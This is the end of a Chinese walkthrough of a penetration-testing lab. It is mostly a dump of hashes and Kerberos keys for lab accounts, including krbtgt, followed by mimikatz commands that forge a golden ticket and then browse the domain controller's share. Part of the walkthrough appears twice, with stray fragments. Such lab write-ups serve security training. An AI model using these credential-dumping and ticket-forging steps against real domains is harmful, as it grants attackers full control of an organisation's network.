Hash 02: 8de980598385fc97eb4f766fbeef22b0
Hash 03: fe993dac00e443d07671526c37d3507e
Hash 04: 1df23e1c46610647cdedc0a0f98f62e7
Hash 05: 8de980598385fc97eb4f766fbeef22b0
Hash 06: 52d7360f983d9be266f2c4ccab9e043d
Hash 07: 1df23e1c46610647cdedc0a0f98f62e7
Hash 08: c61d8792927d7c551dad900cb0730531
Hash 09: c61d8792927d7c551dad900cb0730531
Hash 10: 61c9a81cf08dfe0b0904a0a3b8b30983
Hash 11: d9bacbcbf2fc7c2004d72413db401077
Hash 12: c61d8792927d7c551dad900cb0730531
Hash 13: d56f9388648cc2d8a2a6060abcaa693c
Hash 14: d9bacbcbf2fc7c2004d72413db401077
Hash 15: ac22ff4322fe2094cbe9009722bcb3c9
Hash 16: ac22ff4322fe2094cbe9009722bcb3c9
Hash 17: ce60fd716456f3de87961e851ba51fbf
Hash 18: a0b49e011e8f82818c1f7bffc8d1e408
Hash 19: b929a1e51bd418a9d8d35104bf2bc545
Hash 20: 1de0d4075337358dd6b2cf3b16167248
Hash 21: 5859a3d4668a4f533310e37bb5d1bb79
Hash 22: 5859a3d4668a4f533310e37bb5d1bb79
Hash 23: 9eb9dd7f1508370e2f2a6b2e4a3d9da1
Hash 24: acbda9723b4f79785607fe21da2f32b1
Hash 25: acbda9723b4f79785607fe21da2f32b1
Hash 26: 112502c8023e43bb97e09ea1a04f6a93
Hash 27: 83bb306d12e645f98c306b990a456829
Hash 28: 1ceb62cb6d2476acfd3105833ff4c8b1
Hash 29: 69738de038e72a034acc228db4d00691
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=dbadmin,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1105
Guid: e47bab1e-4bac-4c4e-9a3c-e6be41f8a39f
SamAccountName: dbadmin
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: True
UserAccountControl: NormalAccount
AdminCount: True
Deleted: False
LastLogon: 5/21/2025 11:12:46 PM
DisplayName:
GivenName:
Surname:
Description:
ServicePrincipalName: {MSSQLSvc/Offensive-SQL1.offensive.local:SQLEXPRESS,
MSSQLSvc/Offensive-SQL1.offensive.local:1433, MSSQLSvc/SQL1.offensive.local:SQLEXPRESS,
MSSQLSvc/SQL1.offensive.local:1433}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: 3766c17d09689c438a072a33270cb6f5
LMHash:
NTHashHistory:
Hash 01: 3766c17d09689c438a072a33270cb6f5
Hash 02: fc525c9683e8fe067095ba2ddc971889
LMHashHistory:
Hash 01: 45e4641cbcff684f638c37146c1d498b
Hash 02: 45e17baf5415fe1898a47872ff10e275
SupplementalCredentials:
ClearText:
NTLMStrongHash: f2f2501092f31772a42d1ef531199ba6
Kerberos:
Credentials:
DES_CBC_MD5
Key: 4f151c983b51a4dc
OldCredentials:
DES_CBC_MD5
Key: f71f40a79b8cb32c
Salt: OFFENSIVE.LOCALdbadmin
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: f2e984a29281305d20ad37b1170eddb279e52fb5da67023185d8ece639f5afb9
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: c45ad0a47ea86b2f39ff5a38ab7050bd
Iterations: 4096
DES_CBC_MD5
Key: 4f151c983b51a4dc
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 734f580997a8dc8cf076e1dc52940519c34f434bf79d5ffdcccd6a91e2be2745
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: b13a755be321769f32a67f4c38c3ad5b
Iterations: 4096
DES_CBC_MD5
Key: f71f40a79b8cb32c
Iterations: 4096
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALdbadmin
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 411d2403112e3ea4ff8454a53ea7a33c
Hash 02: 1c6775aa86fa4519b95693946811f0cb
Hash 03: 6cd855071e1b09d519530ecd69c89751
Hash 04: 411d2403112e3ea4ff8454a53ea7a33c
Hash 05: 1c6775aa86fa4519b95693946811f0cb
Hash 06: 4829cf89d4454f930e4e5a0a4e6bdb8e
Hash 07: 411d2403112e3ea4ff8454a53ea7a33c
Hash 08: acd500962a0583cbf58961cbaa2aa974
Hash 09: acd500962a0583cbf58961cbaa2aa974
Hash 10: 7fb3829764b63142b44e928851fff5b9
Hash 11: 0cc3e42577bba6dca0813a7d4d21c142
Hash 12: acd500962a0583cbf58961cbaa2aa974
Hash 13: 1ae930c40940f614d28a9f46a2aac452
Hash 14: 0cc3e42577bba6dca0813a7d4d21c142
Hash 15: 628255ff4fcf47f88832fb40633512d0
Hash 16: 628255ff4fcf47f88832fb40633512d0
Hash 17: 1ec6276b969e0559a90253fefee8e0c9
Hash 18: 00412dbb582ea5645d8a2db74527c844
Hash 19: eecac2290c0fa6156e710ccd50282a8c
Hash 20: d487d7a2efd78ffdbb4d649803c1646c
Hash 21: ad77e52d93a667198be0c83bcaf348d4
Hash 22: ad77e52d93a667198be0c83bcaf348d4
Hash 23: f6809389ff660510fcba53b326967f6d
Hash 24: 646fbbca783e77f87e18dfad0f76d431
Hash 25: 646fbbca783e77f87e18dfad0f76d431
Hash 26: 0bb6693cf357ec633b613f953447fe71
Hash 27: 2fae64a50adf5398bcf41705842b20e7
Hash 28: 44464cdf83257831f8178a7c39f69ac2
Hash 29: 63553ba19edb1e36b201d72fd26d0ad2
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=DC,OU=Domain Controllers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1000
Guid: 39012fdf-6463-445f-ab8e-bccbdd77b46c
SamAccountName: DC$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 516
SidHistory:
Enabled: True
UserAccountControl: ServerAccount, TrustedForDelegation
AdminCount: False
Deleted: False
LastLogon: 5/22/2025 12:00:02 AM
DisplayName: DC$
GivenName:
Surname:
Description:
ServicePrincipalName: {ldap/c332c98f-0968-4bc8-a01a-7b01fec86208._msdcs.offensive.local,
E3514235-4B06-11D1-AB04-00C04FC2DCD2/c332c98f-0968-4bc8-a01a-7b01fec86208/offensive.local,
RPC/c332c98f-0968-4bc8-a01a-7b01fec86208._msdcs.offensive.local, ldap/OFFENSIVE-DC...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: d66e6f345f491c547ab90cfb157390c9
LMHash:
NTHashHistory:
Hash 01: d66e6f345f491c547ab90cfb157390c9
Hash 02: 51f0128a5ace0bdd587f939213ac5eb5
LMHashHistory:
Hash 01: 045353c4692495d7dd29697b976b6540
SupplementalCredentials:
ClearText:
NTLMStrongHash:
Kerberos:
Credentials:
DES_CBC_MD5
Key: 5e5bceb3df5197ea
OldCredentials:
DES_CBC_MD5
Key: f4a8891a6b456420
Salt: OFFENSIVE.LOCALhostdc.offensive.local
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 576162f949052e2e0d11e98de83818d2db8afdd99505572f033d3e2b76cbce1d
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 166979488a60530f566434448261fcc2
Iterations: 4096
DES_CBC_MD5
Key: 5e5bceb3df5197ea
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: cd7aff7dc4061cf682d6826aaf57fcb4bbf77ca7a6da12aa38e5ba7b340b6338
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 17b13a45e37deabb2f851c3cf416c90a
Iterations: 4096
DES_CBC_MD5
Key: f4a8891a6b456420
Iterations: 4096
OlderCredentials:
AES256_CTS_HMAC_SHA1_96
Key: bdb7f05dfd7dfd090fdbf0742de14978b981375f7bfa40d2270b9fc21e2eb0fa
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: ad1f41fe62cdc231a77e085bcad1128e
Iterations: 4096
DES_CBC_MD5
Key: 67e6c28625912c57
Iterations: 4096
ServiceCredentials:
Salt: OFFENSIVE.LOCALhostdc.offensive.local
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 1bb07bebf7f96371f1de1400278ac2c4
Hash 02: cb87fd0308267f9d687185ecbb03e697
Hash 03: 1bb07bebf7f96371f1de1400278ac2c4
Hash 04: 1bb07bebf7f96371f1de1400278ac2c4
Hash 05: e8f91fe9fabd7456f3e6539745140b7c
Hash 06: e8f91fe9fabd7456f3e6539745140b7c
Hash 07: cc343ef7fb5691c47d1a3a4f702ba5cc
Hash 08: f4aabe1af294ef01584044bfba4c5d8b
Hash 09: 8d59717e1398a91d7467407916d2cfa6
Hash 10: 7ece76e3060264ab775eafe1b1e234e1
Hash 11: 7ece76e3060264ab775eafe1b1e234e1
Hash 12: f4aabe1af294ef01584044bfba4c5d8b
Hash 13: f4aabe1af294ef01584044bfba4c5d8b
Hash 14: 2cf0dfbe30d430545ee8a7c285ce32bf
Hash 15: 437194c2e99971df9774566e6eb95b21
Hash 16: 588541add7bd772e608fc2c15a2fb45f
Hash 17: c9a90cd75c4694fc02ecb9840887619d
Hash 18: 794f4e30b9e731b48dc5da6ebb459a73
Hash 19: d6f432cd39e7b628417bbd8de4a3196e
Hash 20: 794f4e30b9e731b48dc5da6ebb459a73
Hash 21: ee4600ad6839293e999184fedba1040b
Hash 22: 4e1e5f912d70b1d925299dc169c6f484
Hash 23: ee4600ad6839293e999184fedba1040b
Hash 24: 534126de07c97dcbe4e58ae27af67500
Hash 25: 0c0d957ae780724993685276bd9dd161
Hash 26: d6282162c866a82e7f418ffefcf69770
Hash 27: e743910adefc57e8ec1791df291e4850
Hash 28: ab3a77490142c04c6b355f91aa378d8a
Hash 29: e743910adefc57e8ec1791df291e4850
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=SQL1,CN=Computers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1106
Guid: feef262e-517c-4688-afd2-613061c3dc4e
SamAccountName: SQL1$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 515
SidHistory:
Enabled: True
UserAccountControl: WorkstationAccount
AdminCount: False
Deleted: False
LastLogon: 9/1/2019 12:19:13 AM
DisplayName: SQL1$
GivenName:
Surname:
Description:
ServicePrincipalName: {HOST/SQL1, RestrictedKrbHost/SQL1, WSMAN/SQL1, HOST/SQL1.offensive.local...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: 9f8482a3e31287796f3c90e44b5030e3
LMHash:
NTHashHistory:
Hash 01: 9f8482a3e31287796f3c90e44b5030e3
Hash 02: 8a1d80f9f688a8c5c232d8487a800a9b
LMHashHistory:
Hash 01: c013317673496b06eb212e686bb7b727
Hash 02: 830e0a79b463a53b6b471ff4756f6843
SupplementalCredentials:
ClearText:
NTLMStrongHash:
Kerberos:
Credentials:
DES_CBC_MD5
Key: 89dc024f8f469ebc
OldCredentials:
DES_CBC_MD5
Key: e679c707fbe62925
Salt: OFFENSIVE.LOCALhostsql1.offensive.local
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: eaf326c486cd87cb8d5e535cf5c74f26220261b7312f37b643c8e42a36c2a954
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 42442517fa581ac8ac63b67b59ef2f69
Iterations: 4096
DES_CBC_MD5
Key: 89dc024f8f469ebc
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 5070a3289087ef698aff67c0b150717c49187e99fe77b5901cbcc28fa1bf6532
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: bab0a3db744c8d8142c35af31355a70c
Iterations: 4096
DES_CBC_MD5
Key: e679c707fbe62925
Iterations: 4096
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALhostsql1.offensive.local
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: ecc93ae46088e5771c47ffe686fedb5a
Hash 02: b85432c985be922b9705a9db46db7ab0
Hash 03: ecc93ae46088e5771c47ffe686fedb5a
Hash 04: ecc93ae46088e5771c47ffe686fedb5a
Hash 05: bb53a07906e61fa04baad5e972dc60a8
Hash 06: bb53a07906e61fa04baad5e972dc60a8
Hash 07: 4474f5d8af68778b9eb636b2546a1ad2
Hash 08: 26e8b23879ed904180be8d5ca24a67de
Hash 09: 3ce46aefa080a2b1c78780c83bb6c890
Hash 10: cffaf1512bb51b355af1904b0ad7348a
Hash 11: cffaf1512bb51b355af1904b0ad7348a
Hash 12: 26e8b23879ed904180be8d5ca24a67de
Hash 13: 26e8b23879ed904180be8d5ca24a67de
Hash 14: e6b8e5d39655d8283f65de527dcc37c0
Hash 15: f34002145595e74dbd5d10b7a5108373
Hash 16: 30e8f147527873bfd62f8ba429235e13
Hash 17: 7bdaeb0357e81c6557960a4085856758
Hash 18: be5d65b938d13e934835293b045aed60
Hash 19: 45ba74247bbfb9868625a91a95c42430
Hash 20: be5d65b938d13e934835293b045aed60
Hash 21: 8e207f6ee1950204d68f7fecddb458be
Hash 22: e8eaf22ac82aa9025943c3eea33fb713
Hash 23: 8e207f6ee1950204d68f7fecddb458be
Hash 24: 93d2e3240fa6d7beda09d91b91ad5000
Hash 25: d91dbe68b8f8de1520443941ce90b4fd
Hash 26: 106534f2868125b461d7f953b88bac30
Hash 27: 43f5b6861a7752bea23a0ff9b2730cfb
Hash 28: b36480ae6e3ad7a9b16ae7ba271ad5f2
Hash 29: 43f5b6861a7752bea23a0ff9b2730cfb
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=CLIENT1,CN=Computers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1107
Guid: c62b1cf1-aa56-4fbc-a57d-c85738369137
SamAccountName: CLIENT1$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 515
SidHistory:
Enabled: True
UserAccountControl: WorkstationAccount
AdminCount: False
Deleted: False
LastLogon: 5/21/2025 11:48:26 PM
DisplayName: CLIENT1$
GivenName:
Surname:
Description:
ServicePrincipalName: {HOST/CLIENT1, RestrictedKrbHost/CLIENT1, HOST/Client1.offensive.local,
RestrictedKrbHost/Client1.offensive.local...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: f35a35660a694c0210b900af487110e5
LMHash:
NTHashHistory:
Hash 01: f35a35660a694c0210b900af487110e5
Hash 02: d163be58e570bc2916759e1fbe6549e3
LMHashHistory:
Hash 01: 9e8a5b074ea559c2a100cd53b9d2d548
Hash 02: 10cf41351365f7387bdeb9cceb37149c
SupplementalCredentials:
ClearText:
NTLMStrongHash:
Kerberos:
Credentials:
DES_CBC_MD5
Key: 3bec083873a43e1f
OldCredentials:
DES_CBC_MD5
Key: dc26a2a892ce2040
Salt: OFFENSIVE.LOCALhostclient1.offensive.local
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 065eada218fe0652639d7a631c3cd4b86385d3028f4844642ddd7fde6edf8954
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 2aac7eaeb3f9eff20df5e9ac5615ae08
Iterations: 4096
DES_CBC_MD5
Key: 3bec083873a43e1f
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 83ae3346ed56fa3258422271103eaf1aea0569ed3806bf26b08524a54effa63d
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 9898b4c510ad33b3c3f8e87bfc8c9c40
Iterations: 4096
DES_CBC_MD5
Key: dc26a2a892ce2040
Iterations: 4096
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALhostclient1.offensive.local
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 601b6bf5886cc098f31b8381eaa6a7a4
Hash 02: e1d0983661bcfd4e8ae9ef49274f5f73
Hash 03: 601b6bf5886cc098f31b8381eaa6a7a4
Hash 04: 601b6bf5886cc098f31b8381eaa6a7a4
Hash 05: 918633523b5b82f9e91da9bc4d15f303
Hash 06: 918633523b5b82f9e91da9bc4d15f303
Hash 07: f5957ca6e12a200b992044d0e2f9811b
Hash 08: 6b6247188ef0875e60343ee8566e345c
Hash 09: 78df026a98b333ff7de06b1cd7e4847e
Hash 10: 3505b0760ba4343008d093af585f53a2
Hash 11: 3505b0760ba4343008d093af585f53a2
Hash 12: 6b6247188ef0875e60343ee8566e345c
Hash 13: 6b6247188ef0875e60343ee8566e345c
Hash 14: 57f385c2d17ecee2a2606e67bf6f5c2a
Hash 15: 6ebcf69f9efcea9f0eb7233f545023bc
Hash 16: ce9faa4f42b9804e3a568134af281660
Hash 17: 11bfa2ec83d4f1bef71a49df1c464733
Hash 18: 45e79344fd4ebdef212fc046c15b180b
Hash 19: 9640aefa1fcdfe98549f61dd363d04b2
Hash 20: 45e79344fd4ebdef212fc046c15b180b
Hash 21: ec1b3218d17f2daf0ba1009b4d4a2ceb
Hash 22: 8d6ac11969172e6b8bbc21dc64810a32
Hash 23: ec1b3218d17f2daf0ba1009b4d4a2ceb
Hash 24: 7e11bc36cb4bde1b3c47fca9158ccd59
Hash 25: 2b1b4e4fb5c52ea51e3dd840a0dcdf58
Hash 26: 32cddd1c07fd2e92733c8fb23294fc58
Hash 27: 48f7c3b70fa387eff4f28b73c3dd69c8
Hash 28: 2cce025286c581ccb040873d40adda1e
Hash 29: 48f7c3b70fa387eff4f28b73c3dd69c8
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
DistinguishedName: CN=OFFENSIVE-SQL1,CN=Computers,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-1601
Guid: 879e3840-a795-4733-80ad-c86f2a0f3b89
SamAccountName: OFFENSIVE-SQL1$
SamAccountType: Computer
UserPrincipalName:
PrimaryGroupId: 515
SidHistory:
Enabled: True
UserAccountControl: WorkstationAccount
AdminCount: False
Deleted: False
LastLogon: 5/21/2025 11:53:26 PM
DisplayName:
GivenName:
Surname:
Description:
ServicePrincipalName: {HOST/Offensive-SQL1.offensive.local, RestrictedKrbHost/Offensive-SQL1.offensive.local,
HOST/OFFENSIVE-SQL1, RestrictedKrbHost/OFFENSIVE-SQL1...}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: d0758c8de2306c7c45818adccfa82c6e
LMHash:
NTHashHistory:
Hash 01: d0758c8de2306c7c45818adccfa82c6e
Hash 02: 00d43d5ee51193638bcee3e59a83f9ae
LMHashHistory:
Hash 01: b1daca81ae1ce2e1c9344b8d9c4636ce
Hash 02: 08c1995d7dbeffbfe83b947d8e9dfe8e
SupplementalCredentials:
ClearText:
NTLMStrongHash:
Kerberos:
Credentials:
DES_CBC_MD5
Key: 0bc78ad080f25275
OldCredentials:
DES_CBC_MD5
Key: 4a16041c01648c34
Salt: OFFENSIVE.LOCALhostoffensive-sql1.offensive.local
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 749b134a380d7bbab260fee764233725261c7374ddb7a8befd2574979c3375d6
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 810fe77f95b0ae4fa93deba2ef6bdd07
Iterations: 4096
DES_CBC_MD5
Key: 0bc78ad080f25275
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 45baa4b9dc90d32d5b3c4c59f08116e3f266161e76b8693a99db2e67a649c00a
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: e502b718eeceb4bed26778f5037da446
Iterations: 4096
DES_CBC_MD5
Key: 4a16041c01648c34
Iterations: 4096
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALhostoffensive-sql1.offensive.local
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: f8be0ab14325a041bae17ddb16e0297e
Hash 02: cf4e36ed4a2ef37d951658680097a601
Hash 03: f8be0ab14325a041bae17ddb16e0297e
Hash 04: f8be0ab14325a041bae17ddb16e0297e
Hash 05: 3b561a5da67c37bd77e04c0539d65b23
Hash 06: 3b561a5da67c37bd77e04c0539d65b23
Hash 07: 48378aea7cc2350629cb085cd6e988b7
Hash 08: 8c71a5cc9147a06a18d13ecad28480a8
Hash 09: e046518cc4f3ba0187df94cb1af071f1
Hash 10: 11e1497b8094eccf5af12de6a4958037
Hash 11: 11e1497b8094eccf5af12de6a4958037
Hash 12: 8c71a5cc9147a06a18d13ecad28480a8
Hash 13: 8c71a5cc9147a06a18d13ecad28480a8
Hash 14: b237085d8f49603dc25875194d12e144
Hash 15: d6db51ead7593aff3cce1b10c9f7d084
Hash 16: a621df72a064b64244442d2afc037076
Hash 17: d073553de8a3e7f289a3b4f108da3cdc
Hash 18: 7cfe2ca8e225ae819c28051ad1910a42
Hash 19: aa736ceb0ae99a5872d9be8b64298c96
Hash 20: 7cfe2ca8e225ae819c28051ad1910a42
Hash 21: 977a3dde0228a36a9e8d2b912666b765
Hash 22: c02a74fe0c5978353634681982376f0a
Hash 23: 977a3dde0228a36a9e8d2b912666b765
Hash 24: 2f0aa43e0ecd165304be79caadbae2f0
Hash 25: 28897eef01e6d42f168548554ac10358
Hash 26: 9f71bffc306299c934a8d6150fdf7864
Hash 27: 343bd1f624e42679f0a5d465f392c2c7
Hash 28: 397774b2a8e1ff2693447dab8c3a2c5b
Hash 29: 343bd1f624e42679f0a5d465f392c2c7
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
解密成功了,我们找到krbtgt的密钥
DistinguishedName: CN=krbtgt,CN=Users,DC=offensive,DC=local
Sid: S-1-5-21-1187620287-4058297830-2395299116-502
Guid: 9069b2a1-dc1f-4304-bd7d-75c2981ce733
SamAccountName: krbtgt
SamAccountType: User
UserPrincipalName:
PrimaryGroupId: 513
SidHistory:
Enabled: False
UserAccountControl: Disabled, NormalAccount
AdminCount: True
Deleted: False
LastLogon:
DisplayName:
GivenName:
Surname:
Description: Key Distribution Center Service Account
ServicePrincipalName: {kadmin/changepw}
SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,
DiscretionaryAclProtected, SelfRelative
Owner: S-1-5-21-1187620287-4058297830-2395299116-512
Secrets
NTHash: 61d83c569b93bfcd4ca2087011361caa
LMHash:
NTHashHistory:
Hash 01: 61d83c569b93bfcd4ca2087011361caa
LMHashHistory:
Hash 01: 8a0c759ba84902c107491a110cc5eb11
SupplementalCredentials:
ClearText:
NTLMStrongHash: 03e46263c90a310e6120dbb0443d2775
Kerberos:
Credentials:
DES_CBC_MD5
Key: 26cdb9166b8a5897
OldCredentials:
Salt: OFFENSIVE.LOCALkrbtgt
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: dbae18467bd2eeb7eb2679e759b2b14d0755c1a4c3757b2f475399bb4ddb73b2
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: acf72b52482ca2fd5e3b4b7b4082bb98
Iterations: 4096
DES_CBC_MD5
Key: 26cdb9166b8a5897
Iterations: 4096
OldCredentials:
OlderCredentials:
ServiceCredentials:
Salt: OFFENSIVE.LOCALkrbtgt
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 02: 700cb6846ef697a0511751b028f17710
Hash 03: ae90de64d9f4bdb2d6603790ac99be49
Hash 04: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 05: 700cb6846ef697a0511751b028f17710
Hash 06: 4cddad54c8c4ba642b304d3f94ce3c3c
Hash 07: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 08: 6f5a5174852e2968cc601c2cb1f52f43
Hash 09: 6f5a5174852e2968cc601c2cb1f52f43
Hash 10: 71eca34e61d5b426bfe06dcc474c00fb
Hash 11: 5d525f82d65498a69a696ab9c4467712
Hash 12: 6f5a5174852e2968cc601c2cb1f52f43
Hash 13: 72ad28b48a0aa05ad995fabaaa734a72
Hash 14: 5d525f82d65498a69a696ab9c4467712
Hash 15: b755afb81b2c709fe6cd82a1a9dbca71
Hash 16: b755afb81b2c709fe6cd82a1a9dbca71
Hash 17: a162dedd4b0f6b269064d5064eb09746
Hash 18: f519c3aff0eb14aa098cff4432b45448
Hash 19: 2b3dfeb590b5dc08ea71e13a4335cc03
Hash 20: 9d1512fad413e6532cc8c174f1f8df83
Hash 21: 842035136db4cd50bd988cfaecce0a13
Hash 22: 842035136db4cd50bd988cfaecce0a13
Hash 23: 2e907c596a7c784f0e71bab7f2384443
Hash 24: c794ef59cc7b0919451ae2a934a924f4
Hash 25: c794ef59cc7b0919451ae2a934a924f4
Hash 26: cb2b83b833a131daa0830b1fe1572438
Hash 27: a994bcdf6f69cfd3768df73477af0fdf
Hash 28: d731fff19c891a814f74f533b76c0366
Hash 29: 722a0317349cdc5c3d00a487c7c179f0
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
密钥是:
61d83c569b93bfcd4ca2087011361caa
构造金票条件:
- 域名称
- 域的SID值
- 域的KRBTGT账号的HASH
- 伪造任意用户名
用mimikatz构造金票
kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /rc4:61d83c569b93bfcd4ca2087011361caa /user:idontexist /id:500 (保存在文件中)
kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /rc4:61d83c569b93bfcd4ca2087011361caa /user:idontexist /id:500 /ptt (保存在内存中)
kerberos::list 查看票据
dir \\dc.offensive.local\c$
可以直接查看域控文件了
到此就而结束了!
参考:
https://www.anquanke/post/id/193431#h2-5
4c8c4ba642b304d3f94ce3c3c
Hash 07: 33d23a0ebb6d4f5fdc6e429769f6b152
Hash 08: 6f5a5174852e2968cc601c2cb1f52f43
Hash 09: 6f5a5174852e2968cc601c2cb1f52f43
Hash 10: 71eca34e61d5b426bfe06dcc474c00fb
Hash 11: 5d525f82d65498a69a696ab9c4467712
Hash 12: 6f5a5174852e2968cc601c2cb1f52f43
Hash 13: 72ad28b48a0aa05ad995fabaaa734a72
Hash 14: 5d525f82d65498a69a696ab9c4467712
Hash 15: b755afb81b2c709fe6cd82a1a9dbca71
Hash 16: b755afb81b2c709fe6cd82a1a9dbca71
Hash 17: a162dedd4b0f6b269064d5064eb09746
Hash 18: f519c3aff0eb14aa098cff4432b45448
Hash 19: 2b3dfeb590b5dc08ea71e13a4335cc03
Hash 20: 9d1512fad413e6532cc8c174f1f8df83
Hash 21: 842035136db4cd50bd988cfaecce0a13
Hash 22: 842035136db4cd50bd988cfaecce0a13
Hash 23: 2e907c596a7c784f0e71bab7f2384443
Hash 24: c794ef59cc7b0919451ae2a934a924f4
Hash 25: c794ef59cc7b0919451ae2a934a924f4
Hash 26: cb2b83b833a131daa0830b1fe1572438
Hash 27: a994bcdf6f69cfd3768df73477af0fdf
Hash 28: d731fff19c891a814f74f533b76c0366
Hash 29: 722a0317349cdc5c3d00a487c7c179f0
Key Credentials:
Credential Roaming
Created:
Modified:
Credentials:
密钥是:
61d83c569b93bfcd4ca2087011361caa
构造金票条件:
- 域名称
- 域的SID值
- 域的KRBTGT账号的HASH
- 伪造任意用户名
用mimikatz构造金票
kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /rc4:61d83c569b93bfcd4ca2087011361caa /user:idontexist /id:500 (保存在文件中)
kerberos::golden /sid:S-1-5-21-1187620287-4058297830-2395299116 /domain:offensive.local /rc4:61d83c569b93bfcd4ca2087011361caa /user:idontexist /id:500 /ptt (保存在内存中)
[外链图片转存中...(img-NMhDxwsd-1747989349704)]
kerberos::list 查看票据
[外链图片转存中...(img-EqXHutFR-1747989349704)]
dir \dc.offensive.local\c$
可以直接查看域控文件了
到此就而结束了!
参考:
https://www.anquanke/post/id/193431#h2-5
https://wh0ale.github.io/2019/12/16/Offensive%E5%9F%9F%E7%8E%AF%E5%A2%83%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F/
版权声明:本文标题:Offensive靶机渗透 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1749741793a2755894.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论